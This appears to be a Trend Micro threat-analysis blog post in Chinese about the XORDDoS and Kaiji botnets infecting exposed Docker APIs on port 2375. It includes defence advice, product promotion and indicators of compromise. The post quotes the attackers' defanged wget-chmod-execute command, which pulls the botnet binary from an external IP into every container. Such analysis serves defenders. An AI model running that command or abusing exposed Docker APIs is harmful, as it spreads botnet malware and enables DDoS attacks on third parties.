趨勢科技最近偵測到兩種會攻擊暴露Docker伺服器的Linux殭屍網路病毒;它們是XORDDoS惡意軟體(趨勢科技偵測為Backdoor.Linux.XORDDOS.AE)和Kaiji DDoS惡意軟體(趨勢科技偵測為DDoS.Linux.KAIJI.A)。
將Docker伺服器當作目標是XORDDoS和Kaiji的新發展。XORDDoS已知會攻擊雲端環境內的Linux主機,而最近出現的Kaiji最初被發現是針對物聯網(IoT ,Internet of Thing)裝置。攻擊者通常會掃描開放的SSH和Telnet端口,再來用殭屍網路進行暴力攻擊。現在它們會用暴露端口2375來搜尋Docker伺服器。端口2375是Docker API使用的兩個端口之一,用於未加密和無身份認證通訊。
但這兩種惡意軟體的攻擊方法有著顯著差異。XORDDoS攻擊會入侵Docker伺服器來感染所有託管的容器,Kaiji則會部署自己的容器來放DDoS惡意軟體。
這些惡意軟體可以用來進行分散式阻斷服務攻擊HYPERLINK “https://blog.trendmicro.com.tw/?p=16497” (DDoS)攻擊,這是種封鎖、破壞或關閉網路、網站或服務的攻擊。利用眾多系統所產生的流量來癱瘓目標系統,讓其他使用者無法連上。
XORDDoS惡意軟體分析
XORDDoS感染鏈從攻擊者搜尋公開Docker API端口2375的主機開始。接著會送出命令來列出託管在Docker伺服器上的容器。之後攻擊者會對所有的容器執行下列命令,用XORDDoS惡意軟體感染所有容器:
| wget hxxp://122[.]51[.]133[.]49:10086/VIP –O VIP chmod 777 VIP ./VIP |
XORDDoS惡意程式(趨勢科技偵測為Backdoor.Linux.XORDDOS.AE)仍然用之前攻擊所用的XOR金鑰(BB2FA36AAA9541F0)來加密字串及跟命令和控制(C&C)伺服器通訊。它還會在機器內部建立多個副本來作為持續性機制。
惡意程式會啟動SYN、ACK和DNS類型的DDoS攻擊。
它還可以下載和執行更多惡意軟體或進行自我更新。
它會收集下列與發動DDoS攻擊有關的資料:
- CPU資訊
- 執行中程序的MD5
- 記憶體資訊
- 網路速度
- 執行中程序的PID
要特別注意的是,此次XORDDoS變種所表現出的大多數行為都在較早版本中出現過。
進一步研究攻擊者相關的網址時,我們發現了其他惡意軟體,如Backdoor.Linux.DOFLOO.AB(Dofloo/AESDDoS Linux殭屍網路病毒),之前也曾攻擊暴露的Docker API。
Kaiji 惡意軟體分析
跟XORDDoS惡意軟體一樣,Kaiji現在也會針對暴露的Docker伺服器進行散播。攻擊者會掃描網際網路上有暴露端口2375的主機。找到目標後會先ping Docker伺服器,再來部署執行Kaiji程式的惡意ARM容器。
腳本123.sh(趨勢科技偵測為Trojan.SH.KAIJI.A)會下載並執行惡意軟體linux_arm(趨勢科技偵測為DDoS.Linux.KAIJI.A)。接著此腳本還會移除其他進行DDoS攻擊所不需要的Linux作業系統基本組件。
圖4. 查詢下載和執行123.sh
圖5. 顯示如何移除Linux檔案的程式碼片段
Kaiji DDoS惡意程式linux_arm會發動以下DDoS攻擊:
- ACK攻擊
- IPS欺騙攻擊
- SSH攻擊
- SYN攻擊
- Synack攻擊
- TCP洪水攻擊
- UDP洪水攻擊
它還會收集下列資料來用於上述攻擊:
- CPU資訊
- 資料夾
- 網域名稱
- 主機IP地址
- 執行中程序的PID
- URL scheme
防護 Docker 伺服器安全建議
從這些發現可以看出惡意軟體作者會不斷地用新功能來升級其作品,好利用其他進入點進行攻擊。因為Docker伺服器可以較輕易地部署到雲端,也讓它成為企業越來越愛用的選項。但這也讓它們成為吸引網路犯罪分子的誘人目標。
底下是一些防護Docker伺服器安全的建議:
- 防護容器主機。使用監視工具,且用為容器設計的作業系統來託管容器。
- 防護網路環境。利用入侵防禦系統(IPS)和網頁過濾技術來提供能見度跟監控進出網路流量。
- 防護管理工具。監視並保護容器儲存庫且強化Kubernetes的安裝。
- 防護構建管道。實施徹底且一致的存取控制方案並安裝強大的端點控制。
- 遵守推薦的最佳實作。
- 使用安全工具來掃描和保護容器。
建議用安全解決方案來保護Docker伺服器。可以用趨勢科技Hybrid Cloud Security來為實體、虛擬和雲端的工作負載提供自動化的安全性和保護,包括了:
- 趨勢科技Cloud One–提供對抗威脅的全面性能見度和防禦
- 趨勢科技Cloud One – Container Security – 能夠自動化容器映像及儲存庫掃描,有助於及早發現威脅
- 趨勢科技Cloud One – Workload Security – 使用如機器學習和虛擬修補等技術來保護新增和現有的工作負載抵禦未知威脅侵害
- 對於軟體即安全:趨勢科技 Deep Security(工作負載和容器安全防護)和趨勢科技Deep Security Smart Check(容器映像安全防護)可以掃描容器映像並防止進一步的入侵破壞
入侵指標
Kaiji
| 檔案名稱 | SHA 256 | 趨勢科技病毒碼偵測 |
| 123.sh | 9301d983e9d8fad3cc205ad67746cd111024daeb4f597a77934c7cfc1328c3d8 | Trojan.SH.KAIJI.A |
| linux_arm | d315b83e772dfddbd2783f016c38f021225745eb43c06bbdfd92364f68fa4c56 | DDoS.Linux.KAIJI.A |
相關網址:
- hxxp://62[.]171[.]160[.]189/linux_arm
- hxxp://62[.]171[.]160[.]189/11/123.sh
XORDDoS和其他透過同一網址找到的惡意軟體
| SHA 256 | 趨勢科技病毒碼偵測 |
| dba757c20fbc1d81566ef2877a9bfca9b3ddb84b9f04c0ca5ae668b7f40ea8c3 | Backdoor.Linux.XORDDOS.AE |
| 6c8f95b82592ac08a03bfe32e4a4dbe637d1f542eb3ab3054042cec8ec301a3c | Backdoor.Linux.DOFLOO.AB |
| 286f774eb5b4f2f7c62d5e68f02a37b674cca7b8c861e189f1f596789322f9fe | Backdoor.Win32.SDDOS.A |
相關網址:
- hxxp://122[.]51[.]133[.]49:10086/VIP
@原文出處:XORDDoS, Kaiji Botnet Malware Variants Target Exposed Docker Servers